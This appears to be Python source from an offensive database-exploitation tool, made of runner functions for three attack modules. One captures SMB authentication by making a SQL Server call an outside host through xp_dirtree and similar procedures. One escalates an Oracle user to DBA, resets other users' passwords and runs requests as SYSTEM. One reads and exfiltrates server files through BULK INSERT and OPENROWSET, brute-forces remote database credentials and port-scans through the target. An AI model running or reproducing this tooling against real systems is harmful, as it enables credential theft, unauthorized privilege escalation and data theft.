def runSMBAuthenticationCaptureModule(args): ''' Run the SMBAuthenticationCapture module ''' if checkOptionsGivenByTheUser(args, [ "capture", "xp-dirtree-capture", "xp-fileexist-capture", "xp-getfiledetails-capture" ], checkAccount=True) == False: return EXIT_MISS_ARGUMENT if args["capture"] != None: smbAuthenticationCapture = SMBAuthenticationCapture( args, args['capture'][0], args['share-name'][0]) elif args["xp-dirtree-capture"] != None: smbAuthenticationCapture = SMBAuthenticationCapture( args, args["xp-dirtree-capture"][0], args['share-name'][0]) elif args["xp-fileexist-capture"] != None: smbAuthenticationCapture = SMBAuthenticationCapture( args, args["xp-fileexist-capture"][0], args['share-name'][0]) elif args["xp-getfiledetails-capture"] != None: smbAuthenticationCapture = SMBAuthenticationCapture( args, args["xp-getfiledetails-capture"][0], args['share-name'][0]) else: smbAuthenticationCapture = SMBAuthenticationCapture( args, "127.0.0.1", args['share-name'][0]) smbAuthenticationCapture.connect() if args["test-module"] == True: smbAuthenticationCapture.testAll() if args["capture"] != None: args['print'].title( "Try to capture a SMB authentication with the xp_dirtree, xp_fileexist or xp_getfiledetails method" ) status = smbAuthenticationCapture.tryToCaptureASmbAuthentication() if status == True: args['print'].unknownNews( "You can perhaps capture a SMB authentication with these methods. Check your SMB capture tool !" ) else: args['print'].badNews( "You can't capture a SMB authentication with these methods") elif args["xp-dirtree-capture"] != None: args['print'].title( "Try to capture a SMB authentication with the xp_dirtree method only" ) status = smbAuthenticationCapture.captureSMBAuthenticationViaXpDirtree( ) if status == True: args['print'].unknownNews( "You can perhaps capture a SMB authentication with the xp_dirtree method. Check your SMB capture tool !" ) else: args['print'].badNews( "You can't capture a SMB authentication with the xp_dirtree method" ) elif args["xp-fileexist-capture"] != None: args['print'].title( "Try to capture a SMB authentication with the xp_fileexist method only" ) status = smbAuthenticationCapture.captureSMBAuthenticationViaXpFileexist( ) if status == True: args['print'].unknownNews( "You can perhaps capture a SMB authentication with the xp_fileexist method. Check your SMB capture tool !" ) else: args['print'].badNews( "You can't capture a SMB authentication with the xp_fileexist method" ) elif args["xp-getfiledetails-capture"] != None: args['print'].title( "Try to capture a SMB authentication with the xp_getfiledetails method only" ) status = smbAuthenticationCapture.captureSMBAuthenticationViaXpGetFileDetails( ) if status == True: args['print'].unknownNews( "You can perhaps capture a SMB authentication with the xp_getfiledetails method. Check your SMB capture tool !" ) else: args['print'].badNews( "You can't capture a SMB authentication with the xp_getfiledetails method" ) smbAuthenticationCapture.closeConnection()
def runPrivilegeEscalationModule(args): ''' Run the Passwords module ''' status = True if checkOptionsGivenByTheUser(args,["test-module", "revoke-dba-role", "dba-with-execute-any-procedure", "alter-pwd-with-create-any-procedure", "dba-with-create-any-trigger", "dba-with-analyze-any", "dba-with-create-any-index", "exec-with-analyze-any", "exec-with-create-any-index", "exec-with-create-any-trigger", "exec-with-create-any-procedure", "exec-with-execute-any-procedure", "get-privs", "get-detailed-privs"]) == False : return EXIT_MISS_ARGUMENT privilegeEscalation = PrivilegeEscalation(args) status = privilegeEscalation.connection(stopIfError=True) if args['test-module'] == True : args['print'].title("Test if the current user can gain elevated access (privilege escalation)") status = privilegeEscalation.testAll() if args['get-privs'] == True : args['print'].title("Get system privileges and roles of current Oracle user") status = privilegeEscalation.printPrivilegesAndRoles() if args['get-detailed-privs'] == True: args['print'].title("Get system privileges and roles of current Oracle user + roles and privileges of roles granted to this current user") status = privilegeEscalation.printPrivilegesAndRoles(deep=True) if args['revoke-dba-role'] == True : args['print'].title("Revoke DBA role from current user ({0})".format(privilegeEscalation.args['user'])) status = privilegeEscalation.revokeDbaRole() if isinstance(status,Exception): args['print'].badNews("Impossible to revoke DBA role from {0}: {1}".format(privilegeEscalation.args['user'], status)) else : args['print'].goodNews("The DBA role has been revoked from {0}".format(privilegeEscalation.args['user'])) if args['dba-with-execute-any-procedure'] == True: args['print'].title("Grant DBA role to current user with CREATE/EXECUTE ANY PROCEDURE method") status = privilegeEscalation.giveDbaRoleWithExecuteAnyProcedureMethod() if isinstance(status,Exception): args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(status)) elif status==None: args['print'].unknownNews("The current user has already DBA role") elif status==True: args['print'].goodNews("The DBA role has been granted to this current user") if args['alter-pwd-with-create-any-procedure'] != None : user, newpwd = privilegeEscalation.args['alter-pwd-with-create-any-procedure'][0], privilegeEscalation.args['alter-pwd-with-create-any-procedure'][1] args['print'].title("Alter the password of {0} by '{1}' with CREATE ANY PROCEDURE method".format(user, newpwd)) status = privilegeEscalation.setPasswordWithCreateAnyProcedureMethod(user, newpwd) if isinstance(status,Exception): args['print'].badNews("Impossible to alter the password of {0}: {1}".format(user, status)) elif status==True: args['print'].goodNews("Password of {0} user modified: The new password of {0} is '{1}'".format(user, newpwd)) if args['dba-with-create-any-trigger'] == True: args['print'].title("Grant DBA role to current user with CREATE ANY TRIGGER method") status = privilegeEscalation.giveDbaRoleWithCreateAnyTriggerMethod() if isinstance(status,Exception): args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(status)) elif status==None: args['print'].unknownNews("The current user has already DBA role") elif status==True: args['print'].goodNews("The DBA role has been granted to this current user") if args['dba-with-analyze-any'] == True: args['print'].title("Grant DBA role to current user with ANALYZE ANY method") status = privilegeEscalation.giveDbaRoleWithAnalyzeAnyMethod() if isinstance(status,Exception): args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(status)) elif status==None: args['print'].unknownNews("The current user has already DBA role") elif status==True: args['print'].goodNews("The DBA role has been granted to this current user") else: args['print'].badNews("The DBA role has NOT been granted to this current user") if args['dba-with-create-any-index'] == True: args['print'].title("Grant DBA role to current user with CREATE ANY INDEX method") status = privilegeEscalation.giveDbaRoleWithCreateAnyIndexMethod() if isinstance(status,Exception): args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(status)) elif status==None: args['print'].unknownNews("The current user has already DBA role") elif status==True: args['print'].goodNews("The DBA role has been granted to this current user") else: args['print'].badNews("The DBA role has NOT been granted to this current user") #Semi manual exploitation if args['exec-with-execute-any-procedure'] != None: args['print'].title("Execute the request as SYSTEM with CREATE/EXECUTE ANY PROCEDURE method") status = privilegeEscalation.executeRequestWithExecuteAnyProcedureMethod(privRequest=args['exec-with-execute-any-procedure'][0]) if isinstance(status,Exception): args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status)) elif status==True: args['print'].goodNews("The request has been executed successfully as system") if args['exec-with-create-any-procedure'] != None: args['print'].title("Execute the request as SYSTEM with CREATE ANY PROCEDURE method only") status = privilegeEscalation.executeSytemRequestWithCreateAnyProcedureMethod(privRequest=args['exec-with-create-any-procedure'][0]) if isinstance(status,Exception): args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status)) elif status==True: args['print'].goodNews("The request has been executed successfully as system") if args['exec-with-create-any-trigger'] != None: args['print'].title("Execute the request as SYSTEM with CREATE ANY TRIGGER method") status = privilegeEscalation.executeSytemRequestWithCreateAnyTriggerMethod(privRequest=args['exec-with-create-any-trigger'][0]) if isinstance(status,Exception): args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status)) elif status==True: args['print'].goodNews("The request has been executed successfully as system") if args['exec-with-analyze-any'] != None: args['print'].title("Execute the request as SYSTEM with ANALYZE ANY method") status = privilegeEscalation.executeSytemRequestWithAnalyzeAnyMethod(privRequest=args['exec-with-analyze-any'][0]) if isinstance(status,Exception): args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status)) elif status==True: args['print'].goodNews("The request has been executed successfully as system") if args['exec-with-create-any-index'] != None: args['print'].title("Execute the request as SYSTEM with CREATE ANY INDEX method") status = privilegeEscalation.executeSytemRequestWithCreateAnyIndexMethod(privRequest=args['exec-with-create-any-index'][0]) if isinstance(status,Exception): args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(status)) elif status==True: args['print'].goodNews("The request has been executed successfully as system")
def runBulkOpenModule(args): ''' Run the BulkOpen module ''' def runBulkInsertForRead(args,bulkOpen): ''' Run the Bulk Insert method to read a file ''' args['print'].title("Try to read the remote file {0} thanks to the Bulk Insert method".format(args["read-file"][0])) data = bulkOpen.readFileViaBulkinsert(args["read-file"][0]) if isinstance(data,Exception): args['print'].badNews("Impossible to read the remote file {0} with Bulk Insert: {1}".format(args["read-file"][0],data)) return data else: args['print'].goodNews("Data stored in the remote file {0}:\n{1}".format(args["read-file"][0], data.encode('utf-8'))) return True def runOpenRowSetForRead(args,bulkOpen): ''' Run the Openrowset method to read a file ''' args['print'].title("Try to read the remote file {0} thanks to the Openrowset method".format(args["read-file"][0])) data = bulkOpen.readFileViaOpenRowSet(args["read-file"][0]) if isinstance(data,Exception): args['print'].badNews("Impossible to read the remote file {0} with Openrowset: {1}".format(args["read-file"][0],data)) return data else: args['print'].goodNews("Data stored in the remote file {0}:\n{1}".format(args["read-file"][0], data.encode('utf-8'))) return True def runBulkInsertForGet(args, bulkOpen): ''' Run the Bulk Insert method to get a remote file ''' args['print'].title("Try to get the remote file {0} thanks to the Bulk Insert method".format(args["get-file"][0])) status = bulkOpen.getFileViaBulkinsert(args["get-file"][0],args["get-file"][1]) if isinstance(status,Exception): args['print'].badNews("Impossible to get the remote file {0} with Bulk Insert: {1}".format(args["get-file"][0],status)) return status else: args['print'].goodNews("Data stored in the remote file {0} is saved in the file {1}".format(args["get-file"][0], args["get-file"][1])) return True def runOpenRowSetForGet(args, bulkOpen): ''' Run the Openrowset method to get a file ''' args['print'].title("Try to get the remote file {0} thanks to the Openrowset method".format(args["get-file"][0])) status = bulkOpen.getFileViaOpenRowSet(args["get-file"][0],args["get-file"][1]) if isinstance(status,Exception): args['print'].badNews("Impossible to get the remote file {0} with Openrowset: {1}".format(args["get-file"][0],status)) return status else: args['print'].goodNews("Data stored in the remote file {0} is saved in the file {1}".format(args["get-file"][0], args["get-file"][1])) return True if checkOptionsGivenByTheUser(args,["read-file","get-file","enable-ad-hoc-distributed-queries","disable-ad-hoc-distributed-queries","search-credentials","scan-ports","request-rdb"],checkAccount=True) == False : return EXIT_MISS_ARGUMENT bulkOpen = BulkOpen(args) bulkOpen.connect() if args["test-module"] ==True: bulkOpen.testAll() #enable-ad-hoc-distributed-queries if args["enable-ad-hoc-distributed-queries"] ==True: args['print'].title("Try to enable ad hoc distributed queries") status = bulkOpen.enableAdHocDistributedQueries() if status == True: args['print'].goodNews("Ad hoc distributed queries has been enabled") else: args['print'].badNews("Impossible to enable ad hoc distributed queries: {1}".format(status)) #read-file option if args["read-file"] != None: if args["method"] != None: if args["method"]==BULKOPEN_METHOD_IN_BULKOPEN: runBulkInsertForRead(args,bulkOpen) elif args["method"]==OPENROWSET_METHOD_IN_BULKOPEN: runOpenRowSetForRead(args,bulkOpen) else: data = runBulkInsertForRead(args,bulkOpen) if isinstance(data,Exception): runOpenRowSetForRead(args,bulkOpen) #get-file option if args["get-file"] != None: if args["method"] != None: if args["method"]==BULKOPEN_METHOD_IN_BULKOPEN: runBulkInsertForGet(args,bulkOpen) elif args["method"]==OPENROWSET_METHOD_IN_BULKOPEN: runOpenRowSetForGet(args,bulkOpen) else: data = runBulkInsertForGet(args,bulkOpen) if isinstance(data,Exception): runOpenRowSetForGet(args,bulkOpen) #dictionary attack on a remote database if args["search-credentials"] != None : args['print'].title("Dictionnary attack on the database {0}:{1}/{2} with the credentials file {3}".format(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2],args['accounts-file'])) accounts = bulkOpen.searchValideAccounts(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2], sqlRequest=DEFAULT_SQL_REQUEST, accountsFile=args['accounts-file']) if isinstance(accounts,Exception): status = bulkOpen.enableAdHocDistributedQueries() if status == True: accounts = bulkOpen.searchValideAccounts(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2], sqlRequest=DEFAULT_SQL_REQUEST, accountsFile=args['accounts-file']) if isinstance(accounts,Exception): args['print'].badNews("Impossible to use openrowset to connect to a remote database: {0}. Impossible to enable OpenRowset: {1}".format(accounts,status)) else : args['print'].goodNews("valid accounts found on {0}:{1}/{2}: {3}".format(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2],accounts)) bulkOpen.disableAdHocDistributedQueries() else : args['print'].badNews("Impossible to use openrowset to connect to a remote database: {0}. Impossible to enable OpenRowset: {1}".format(accounts,status)) else: args['print'].goodNews("valid accounts found on {0}:{1}/{2}: {3}".format(args["search-credentials"][0],args["search-credentials"][1],args["search-credentials"][2],accounts)) #request a remote database from the target if args["request-rdb"] != None : args['print'].title("Try to send the request '{0}' to {1}:{2}@{3}:{4}/{5}".format(args["request-rdb"][5], args["request-rdb"][3], args["request-rdb"][4], args["request-rdb"][0], args["request-rdb"][1],args["request-rdb"][2])) results = bulkOpen.remoteConnectionWithOpenrowset (ip=args["request-rdb"][0], port=args["request-rdb"][1], login=args["request-rdb"][3], password=args["request-rdb"][4], database=args["request-rdb"][2], sqlRequest=args["request-rdb"][5]) if isinstance(results ,Exception): args['print'].badNews("Impossible to request the remote database: {0}".format(results)) else: table = "" for l in results: table += ' | '.join(map(str,l))+'\n' args['print'].goodNews("Results:\n{0}".format(table)) #Scan ports with openrowset if args['scan-ports'] != None: args['print'].title("Scanning ports of {0} through {1}".format(args['scan-ports'][0],args['host'])) results = bulkOpen.scanPortsWithOpenrowset(ip=args['scan-ports'][0], ports=args['scan-ports'][1], nbThread=SCAN_PORT_NUMBER_THREAD) if isinstance(results ,Exception): args['print'].badNews("Impossible to scan ports: {0}".format(results)) #disable-ad-hoc-distributed-queries if args["disable-ad-hoc-distributed-queries"] == True: args['print'].title("Try to disable ad hoc distributed queries") status = bulkOpen.disableAdHocDistributedQueries() if status == True: args['print'].goodNews("Ad hoc distributed queries has been disabled") else: args['print'].badNews("Impossible to disable ad hoc distributed queries: {0}".format(status)) bulkOpen.closeConnection()